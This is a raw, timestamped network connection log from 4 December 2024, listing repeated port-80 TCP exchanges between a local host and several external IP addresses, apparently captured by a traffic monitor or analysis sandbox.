                                                                  Dec 4, 2024 12:49:50.794718981 CET4973780192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:50.915688038 CET804973727.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:52.176594973 CET804973727.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:52.219234943 CET4973780192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:52.297873974 CET4973780192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:52.378205061 CET804973727.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:52.378254890 CET4973780192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:53.316473007 CET4973880192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:53.436400890 CET804973827.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:53.436572075 CET4973880192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:53.451234102 CET4973880192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:53.571187019 CET804973827.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:54.790479898 CET804973827.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:54.844255924 CET4973880192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:54.953717947 CET4973880192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:54.982808113 CET804973827.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:54.982856035 CET4973880192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:55.972460032 CET4973980192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:56.092292070 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.092387915 CET4973980192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:56.106270075 CET4973980192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:56.226139069 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226195097 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226314068 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226380110 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226593018 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226650000 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226778030 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226829052 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:56.226839066 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:57.449558020 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:57.500488043 CET4973980192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:57.611424923 CET4973980192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:57.642241955 CET804973927.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:57.642313004 CET4973980192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:58.628484964 CET4974280192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:58.748260021 CET804974227.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:49:58.748387098 CET4974280192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:58.757409096 CET4974280192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:49:58.910702944 CET804974227.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:50:00.105895996 CET804974227.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:50:00.156745911 CET4974280192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:50:00.298616886 CET804974227.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:50:00.298727989 CET4974280192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:50:00.299803972 CET4974280192.168.2.427.124.4.246
                                                                  Dec 4, 2024 12:50:00.419562101 CET804974227.124.4.246192.168.2.4
                                                                  Dec 4, 2024 12:50:06.687797070 CET4976380192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:06.807569981 CET8049763149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:06.808346987 CET4976380192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:06.831717968 CET4976380192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:06.951452971 CET8049763149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:08.322623968 CET8049763149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:08.322849035 CET8049763149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:08.322932959 CET4976380192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:08.344454050 CET4976380192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:09.363158941 CET4976980192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:09.483002901 CET8049769149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:09.483088970 CET4976980192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:09.499576092 CET4976980192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:09.619357109 CET8049769149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:11.000583887 CET4976980192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:11.032449961 CET8049769149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:11.032476902 CET8049769149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:11.032526016 CET4976980192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:11.032568932 CET4976980192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:11.120585918 CET8049769149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:11.120650053 CET4976980192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:12.019295931 CET4977580192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:12.139448881 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.139564991 CET4977580192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:12.153475046 CET4977580192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:12.273452997 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273464918 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273513079 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273574114 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273602009 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273663044 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273674011 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273693085 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:12.273744106 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:13.656915903 CET4977580192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:13.700366974 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:13.702217102 CET4977580192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:13.703346968 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:13.705219030 CET4977580192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:13.776774883 CET8049775149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:13.777230978 CET4977580192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:14.677515984 CET4978480192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:14.797303915 CET8049784149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:14.797465086 CET4978480192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:14.836179972 CET4978480192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:14.956126928 CET8049784149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:16.311793089 CET8049784149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:16.311883926 CET8049784149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:16.312000990 CET4978480192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:16.314567089 CET4978480192.168.2.4149.88.81.190
                                                                  Dec 4, 2024 12:50:16.434978962 CET8049784149.88.81.190192.168.2.4
                                                                  Dec 4, 2024 12:50:22.417253017 CET4980280192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:22.537775993 CET804980285.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:22.537888050 CET4980280192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:22.552916050 CET4980280192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:22.673377991 CET804980285.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:24.063374996 CET4980280192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:24.183598995 CET804980285.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:24.184392929 CET4980280192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:25.082022905 CET4980880192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:25.201865911 CET804980885.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:25.201978922 CET4980880192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:25.216082096 CET4980880192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:25.335988998 CET804980885.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:26.722193003 CET4980880192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:26.842736006 CET804980885.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:26.842845917 CET4980880192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:27.740612984 CET4981680192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:27.860461950 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:27.860569000 CET4981680192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:27.880558014 CET4981680192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:28.001234055 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001297951 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001351118 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001398087 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001507044 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001527071 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001671076 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001682043 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:28.001718044 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:29.394193888 CET4981680192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:29.514286041 CET804981685.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:29.514437914 CET4981680192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:30.410192013 CET4982580192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:30.530025959 CET804982585.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:30.530107021 CET4982580192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:30.539558887 CET4982580192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:30.659403086 CET804982585.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:31.856322050 CET804982585.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:31.856381893 CET804982585.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:31.856451035 CET4982580192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:31.859637022 CET4982580192.168.2.485.159.66.93
                                                                  Dec 4, 2024 12:50:31.979423046 CET804982585.159.66.93192.168.2.4
                                                                  Dec 4, 2024 12:50:37.454211950 CET4984180192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:37.574032068 CET8049841185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:37.578353882 CET4984180192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:37.639204025 CET4984180192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:37.759126902 CET8049841185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:38.879081964 CET8049841185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:38.879093885 CET8049841185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:38.879151106 CET4984180192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:39.142213106 CET4984180192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:40.275652885 CET4984780192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:40.395487070 CET8049847185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:40.395642042 CET4984780192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:40.440781116 CET4984780192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:40.560606003 CET8049847185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:41.691081047 CET8049847185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:41.691427946 CET8049847185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:41.691760063 CET4984780192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:41.953777075 CET4984780192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:42.994796038 CET4985380192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:43.114639997 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.115653038 CET4985380192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:43.139472008 CET4985380192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:43.259356022 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259368896 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259432077 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259476900 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259690046 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259707928 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259912014 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259932995 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:43.259988070 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:44.412031889 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:44.412064075 CET8049853185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:44.412120104 CET4985380192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:44.641266108 CET4985380192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:45.664110899 CET4986280192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:45.784176111 CET8049862185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:45.784250975 CET4986280192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:45.873195887 CET4986280192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:45.993036985 CET8049862185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:47.033354044 CET8049862185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:47.033447027 CET8049862185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:47.033657074 CET4986280192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:47.036109924 CET4986280192.168.2.4185.27.134.144
                                                                  Dec 4, 2024 12:50:47.155797005 CET8049862185.27.134.144192.168.2.4
                                                                  Dec 4, 2024 12:50:52.392066002 CET4987980192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:52.511960983 CET8049879104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:52.512043953 CET4987980192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:52.529640913 CET4987980192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:52.649555922 CET8049879104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:54.031934977 CET4987980192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:54.112263918 CET8049879104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:54.112297058 CET8049879104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:54.112329960 CET4987980192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:54.112365961 CET4987980192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:54.151737928 CET8049879104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:54.151798010 CET4987980192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:55.050493002 CET4988580192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:55.170280933 CET8049885104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:55.170429945 CET4988580192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:55.186243057 CET4988580192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:55.305934906 CET8049885104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:56.412210941 CET8049885104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:56.413378000 CET8049885104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:56.413444996 CET4988580192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:56.688173056 CET4988580192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:57.707483053 CET4989180192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:57.827395916 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.827471018 CET4989180192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:57.844650030 CET4989180192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:57.964976072 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.964993954 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.965085983 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.965147018 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.965157032 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.965174913 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.965270042 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.965289116 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:57.965338945 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:59.101582050 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:59.101742029 CET8049891104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:50:59.102268934 CET4989180192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:50:59.486268044 CET4989180192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:51:00.505547047 CET4989780192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:51:00.625252008 CET8049897104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:51:00.625334024 CET4989780192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:51:00.636545897 CET4989780192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:51:00.756221056 CET8049897104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:51:02.253109932 CET8049897104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:51:02.253731012 CET8049897104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:51:02.253783941 CET4989780192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:51:02.287425995 CET4989780192.168.2.4104.21.95.160
                                                                  Dec 4, 2024 12:51:02.407605886 CET8049897104.21.95.160192.168.2.4
                                                                  Dec 4, 2024 12:51:07.638256073 CET4991680192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:07.758480072 CET8049916104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:07.758549929 CET4991680192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:07.776355982 CET4991680192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:07.896102905 CET8049916104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:09.201139927 CET8049916104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:09.201184988 CET8049916104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:09.203109026 CET4991680192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:09.282264948 CET4991680192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.301515102 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.421711922 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:10.421799898 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.439372063 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.559253931 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:11.872011900 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:11.872153997 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:11.872200012 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:11.953915119 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:12.972723961 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:13.094368935 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.096782923 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:13.112694979 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:13.232621908 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232636929 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232712030 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232729912 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232800007 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232809067 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232835054 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232882977 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232892990 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:14.513961077 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:14.514751911 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:14.514791965 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:14.625747919 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.644273996 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.764342070 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:15.764422894 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.775770903 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.896028042 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:17.195595026 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:17.195938110 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:17.199007988 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:17.199007988 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:17.318767071 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:22.890281916 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:23.011066914 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:23.011230946 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:23.026318073 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:23.147392035 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:24.516977072 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:24.517057896 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:24.517113924 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:24.532020092 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.550787926 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.670851946 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:25.674365997 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.690303087 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.810277939 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:27.188056946 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:27.188070059 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:27.188205957 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:27.206296921 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.225339890 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.345076084 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.345144033 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.364144087 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.484081030 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484091043 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484121084 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484138012 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484257936 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484266996 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484282970 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484291077 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484358072 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:29.875735998 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:29.995915890 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:29.995965958 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:30.898305893 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:31.018191099 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:31.018338919 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:31.027718067 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:31.147751093 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:32.536885023 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:32.537178040 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:32.537230015 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:32.540070057 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:32.659941912 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:38.036015987 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:38.155699015 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:38.155761957 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:38.176188946 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:38.296099901 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:39.434420109 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:39.434689045 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:39.434909105 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:39.688294888 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.706975937 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.827111006 CET8049998209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:40.830374956 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.846318960 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.966115952 CET8049998209.74.77.107192.168.2.4
